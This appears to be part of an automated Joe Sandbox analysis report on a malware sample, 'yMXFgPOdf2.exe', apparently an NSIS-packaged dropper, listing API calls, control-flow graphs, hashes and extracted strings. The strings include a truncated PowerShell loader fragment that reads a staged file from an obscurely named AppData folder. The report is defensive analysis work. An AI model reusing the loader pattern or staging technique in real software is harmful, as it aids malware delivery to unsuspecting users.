                                                                  • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$over,?), ref: 00403595
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yMXFgPOdf2.exe,0042A9B8,00000001), ref: 004035A9
                                                                  • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 004035D6
                                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040362C
                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403668
                                                                  • ExitProcess.KERNEL32 ref: 0040368B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$over$"C:\Users\user\Desktop\yMXFgPOdf2.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens$C:\Users\user\Desktop$C:\Users\user\Desktop\yMXFgPOdf2.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                  • API String ID: 4107622049-1733218559
                                                                  • Opcode ID: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                  • Instruction ID: 02b0c0aa23ea66072d22554f7a9d706dafbd78a3d23bdfa468f983da76c936b2
                                                                  • Opcode Fuzzy Hash: b79f5bf6b15ea5969d89ca043424e6ca4daa7e51e6b9f16cdbdc5c44e283160b
                                                                  • Instruction Fuzzy Hash: 48B1D230504310AAD7207F619E4AA2B3EACEF4574AF00443FF941B62E1DBBD4A45CB6E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 116 40518a-4051a5 117 405336-40533d 116->117 118 4051ab-405274 GetDlgItem * 3 call 40401b call 4048e8 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 120 405367-405374 117->120 121 40533f-405361 GetDlgItem CreateThread CloseHandle 117->121 141 405292-405295 118->141 142 405276-405290 SendMessageW * 2 118->142 123 405392-40539c 120->123 124 405376-40537c 120->124 121->120 127 4053f2-4053f6 123->127 128 40539e-4053a4 123->128 125 4053b7-4053c0 call 40404d 124->125 126 40537e-40538d ShowWindow * 2 call 40401b 124->126 138 4053c5-4053c9 125->138 126->123 127->125 135 4053f8-4053fe 127->135 131 4053a6-4053b2 call 403fbf 128->131 132 4053cc-4053dc ShowWindow 128->132 131->125 139 4053ec-4053ed call 403fbf 132->139 140 4053de-4053e7 call 40504b 132->140 135->125 136 405400-405413 SendMessageW 135->136 143 405515-405517 136->143 144 405419-405444 CreatePopupMenu call 405dc3 AppendMenuW 136->144 139->127 140->139 145 4052a5-4052bc call 403fe6 141->145 146 405297-4052a3 SendMessageW 141->146 142->141 143->138 153 405446-405456 GetWindowRect 144->153 154 405459-40546e TrackPopupMenu 144->154 155 4052f2-405313 GetDlgItem SendMessageW 145->155 156 4052be-4052d2 ShowWindow 145->156 146->145 153->154 154->143 157 405474-40548b 154->157 155->143 160 405319-405331 SendMessageW * 2 155->160 158 4052e1 156->158 159 4052d4-4052df ShowWindow 156->159 161 405490-4054ab SendMessageW 157->161 162 4052e7-4052ed call 40401b 158->162 159->162 160->143 161->161 163 4054ad-4054d0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->155 165 4054d2-4054f9 SendMessageW 163->165 165->165 166 4054fb-40550f GlobalUnlock SetClipboardData CloseClipboard 165->166 166->143
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004051E9
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004051F8
                                                                  • GetClientRect.USER32(?,?), ref: 00405235
                                                                  • GetSystemMetrics.USER32(00000015), ref: 0040523D
                                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040525E
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040526F
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405282
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405290
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004052A3
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004052C5
                                                                  • ShowWindow.USER32(?,00000008), ref: 004052D9
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004052FA
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040530A
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405323
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040532F
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405207
                                                                    • Part of subcall function 0040401B: SendMessageW.USER32(00000028,?,00000001,00403E47), ref: 00404029
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040534C
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000511E,00000000), ref: 0040535A
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405361
                                                                  • ShowWindow.USER32(00000000), ref: 00405385
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040538A
                                                                  • ShowWindow.USER32(00000008), ref: 004053D4
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                  • CreatePopupMenu.USER32 ref: 00405419
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040542D
                                                                  • GetWindowRect.USER32(?,?), ref: 0040544D
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405466
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040549E
                                                                  • OpenClipboard.USER32(00000000), ref: 004054AE
                                                                  • EmptyClipboard.USER32 ref: 004054B4
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004054C0
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004054CA
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004054DE
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004054FE
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405509
                                                                  • CloseClipboard.USER32 ref: 0040550F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: {
                                                                  • API String ID: 590372296-366298937
                                                                  • Opcode ID: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                  • Instruction ID: 34766a67a8348c891c509fbed0d62983ec1eb8fa6b5cfd063670c437a0e1cb12
                                                                  • Opcode Fuzzy Hash: 203e9f1d86d533f2ebbe7f86b819a7276a20043a8637b95097349cfd405fd485
                                                                  • Instruction Fuzzy Hash: F5B12871800608FFDB119F60DD89AAE7B79FB48355F10803AFA41BA1A0CBB59E51DF58

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 408 405dc3-405dce 409 405dd0-405ddf 408->409 410 405de1-405df7 408->410 409->410 411 405dfd-405e0a 410->411 412 40600f-406015 410->412 411->412 413 405e10-405e17 411->413 414 40601b-406026 412->414 415 405e1c-405e29 412->415 413->412 417 406031-406032 414->417 418 406028-40602c call 405da1 414->418 415->414 416 405e2f-405e3b 415->416 419 405e41-405e7d 416->419 420 405ffc 416->420 418->417 422 405e83-405e8e GetVersion 419->422 423 405f9d-405fa1 419->423 424 40600a-40600d 420->424 425 405ffe-406008 420->425 426 405e90-405e94 422->426 427 405ea8 422->427 428 405fa3-405fa7 423->428 429 405fd6-405fda 423->429 424->412 425->412 426->427 432 405e96-405e9a 426->432 435 405eaf-405eb6 427->435 433 405fb7-405fc4 call 405da1 428->433 434 405fa9-405fb5 call 405ce8 428->434 430 405fe9-405ffa lstrlenW 429->430 431 405fdc-405fe4 call 405dc3 429->431 430->412 431->430 432->427 440 405e9c-405ea0 432->440 444 405fc9-405fd2 433->444 434->444 436 405eb8-405eba 435->436 437 405ebb-405ebd 435->437 436->437 442 405ef9-405efc 437->442 443 405ebf-405ee5 call 405c6e 437->443 440->427 445 405ea2-405ea6 440->445 449 405f0c-405f0f 442->449 450 405efe-405f0a GetSystemDirectoryW 442->450 456 405f84-405f88 443->456 457 405eeb-405ef4 call 405dc3 443->457 444->430 448 405fd4 444->448 445->435 452 405f95-405f9b call 406035 448->452 454 405f11-405f1f GetWindowsDirectoryW 449->454 455 405f7a-405f7c 449->455 453 405f7e-405f82 450->453 452->430 453->452 453->456 454->455 455->453 458 405f21-405f2b 455->458 456->452 461 405f8a-405f90 lstrcatW 456->461 457->453 463 405f45-405f5b SHGetSpecialFolderLocation 458->463 464 405f2d-405f30 458->464 461->452 465 405f76 463->465 466 405f5d-405f74 SHGetPathFromIDListW CoTaskMemFree 463->466 464->463 468 405f32-405f39 464->468 465->455 466->453 466->465 469 405f41-405f43 468->469 469->453 469->463
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,Completed,?,00405082,Completed,00000000,00000000,0041BB2D), ref: 00405E86
                                                                  • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F04
                                                                  • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F17
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F53
                                                                  • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F61
                                                                  • CoTaskMemFree.OLE32(?), ref: 00405F6C
                                                                  • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F90
                                                                  • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405082,Completed,00000000,00000000,0041BB2D), ref: 00405FEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$over$: Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-3199051343
                                                                  • Opcode ID: a1d7122ea6a4abf59baf7160441808ad398ec4c15bbe5b84b7a9635c12faa1f0
                                                                  • Instruction ID: 51fea1f0525bd32aa09071eea97aa62567f0d70ed35b44e0f17875bb3ea282eb
                                                                  • Opcode Fuzzy Hash: a1d7122ea6a4abf59baf7160441808ad398ec4c15bbe5b84b7a9635c12faa1f0
                                                                  • Instruction Fuzzy Hash: 7561EE71A00A06ABDB209F64CC45AAF37A5EF54314F11C13BE941BA2E0D77D9A82CF4D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 470 405629-40564f call 4058f4 473 405651-405663 DeleteFileW 470->473 474 405668-40566f 470->474 475 4057e5-4057e9 473->475 476 405671-405673 474->476 477 405682-405692 call 405da1 474->477 479 405793-405798 476->479 480 405679-40567c 476->480 483 4056a1-4056a2 call 405838 477->483 484 405694-40569f lstrcatW 477->484 479->475 482 40579a-40579d 479->482 480->477 480->479 485 4057a7-4057af call 4060e4 482->485 486 40579f-4057a5 482->486 487 4056a7-4056ab 483->487 484->487 485->475 494 4057b1-4057c5 call 4057ec call 4055e1 485->494 486->475 490 4056b7-4056bd lstrcatW 487->490 491 4056ad-4056b5 487->491 493 4056c2-4056de lstrlenW FindFirstFileW 490->493 491->490 491->493 495 4056e4-4056ec 493->495 496 405788-40578c 493->496 512 4057c7-4057ca 494->512 513 4057dd-4057e0 call 40504b 494->513 499 40570c-405720 call 405da1 495->499 500 4056ee-4056f6 495->500 496->479 498 40578e 496->498 498->479 510 405722-40572a 499->510 511 405737-405742 call 4055e1 499->511 502 4056f8-405700 500->502 503 40576b-40577b FindNextFileW 500->503 502->499 507 405702-40570a 502->507 503->495 506 405781-405782 FindClose 503->506 506->496 507->499 507->503 510->503 515 40572c-405735 call 405629 510->515 523 405763-405766 call 40504b 511->523 524 405744-405747 511->524 512->486 514 4057cc-4057db call 40504b call 405c3b 512->514 513->475 514->475 515->503 523->503 526 405749-405759 call 40504b call 405c3b 524->526 527 40575b-405761 524->527 526->503 527->503
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 00405652
                                                                  • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 0040569A
                                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056BD
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056C3
                                                                  • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004056D3
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405773
                                                                  • FindClose.KERNEL32(00000000), ref: 00405782
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\yMXFgPOdf2.exe", xrefs: 00405632
                                                                  • \*.*, xrefs: 00405694
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405637
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                  • API String ID: 2035342205-1159523439
                                                                  • Opcode ID: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                  • Instruction ID: 537a859ffcff897d8cd5f5cf56393fe58197ce41a03b0bffcce20e97483bf088
                                                                  • Opcode Fuzzy Hash: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                  • Instruction Fuzzy Hash: 2441B230500A18E6DB21AB618D89EBF7778DF86719F14813BF805B21D1D77C4981EE6E
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                  • LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                  • String ID:
                                                                  • API String ID: 310444273-0
                                                                  • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                  • Instruction ID: fdb84e6153f048f4f32cb56b497edeca1f79cb2b45eddc07a3c36f847a24315a
                                                                  • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                  • Instruction Fuzzy Hash: D9E0CD326002309FC3105B34AE4497773AC9FA8740305043DF586F6000CB749C22EF69
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,0040593D,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,75923420,00405649,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 004060EF
                                                                  • FindClose.KERNEL32(00000000), ref: 004060FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                  • Instruction ID: 5d70c47cb11938251a0a1db446d6214bf1d94b5ec034c03d4844f4bffd5ee079
                                                                  • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                  • Instruction Fuzzy Hash: 1DD012755540309BD7805738AE0C84B7A59AF193317224B36F46AF62E0D7788C66869C

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 167 40376b-403783 call 40610b 170 403785-403795 call 405ce8 167->170 171 403797-4037ce call 405c6e 167->171 180 4037f1-40381a call 403a41 call 4058f4 170->180 176 4037d0-4037e1 call 405c6e 171->176 177 4037e6-4037ec lstrcatW 171->177 176->177 177->180 185 403820-403825 180->185 186 4038ac-4038b4 call 4058f4 180->186 185->186 187 40382b-403853 call 405c6e 185->187 192 4038c2-4038e7 LoadImageW 186->192 193 4038b6-4038bd call 405dc3 186->193 187->186 194 403855-403859 187->194 196 403968-403970 call 40140b 192->196 197 4038e9-403919 RegisterClassW 192->197 193->192 198 40386b-403877 lstrlenW 194->198 199 40385b-403868 call 405819 194->199 211 403972-403975 196->211 212 40397a-403985 call 403a41 196->212 200 403a37 197->200 201 40391f-403963 SystemParametersInfoW CreateWindowExW 197->201 205 403879-403887 lstrcmpiW 198->205 206 40389f-4038a7 call 4057ec call 405da1 198->206 199->198 203 403a39-403a40 200->203 201->196 205->206 210 403889-403893 GetFileAttributesW 205->210 206->186 215 403895-403897 210->215 216 403899-40389a call 405838 210->216 211->203 220 40398b-4039a8 ShowWindow LoadLibraryW 212->220 221 403a0e-403a0f call 40511e 212->221 215->206 215->216 216->206 222 4039b1-4039c3 GetClassInfoW 220->222 223 4039aa-4039af LoadLibraryW 220->223 227 403a14-403a16 221->227 225 4039c5-4039d5 GetClassInfoW RegisterClassW 222->225 226 4039db-4039fe DialogBoxParamW call 40140b 222->226 223->222 225->226 233 403a03-403a0c call 4036bb 226->233 229 403a30-403a32 call 40140b 227->229 230 403a18-403a1e 227->230 229->200 230->211 231 403a24-403a2b call 40140b 230->231 231->211 233->203
                                                                  APIs
                                                                    • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                    • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                    • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                  • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004037EC
                                                                  • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040386C
                                                                  • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040387F
                                                                  • GetFileAttributesW.KERNEL32(: Completed), ref: 0040388A
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe), ref: 004038D3
                                                                    • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                  • RegisterClassW.USER32(00433E40), ref: 00403910
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403928
                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040395D
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403993
                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 004039A4
                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 004039AF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433E40), ref: 004039BF
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 004039CC
                                                                  • RegisterClassW.USER32(00433E40), ref: 004039D5
                                                                  • DialogBoxParamW.USER32(?,00000000,00403B0E,00000000), ref: 004039F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
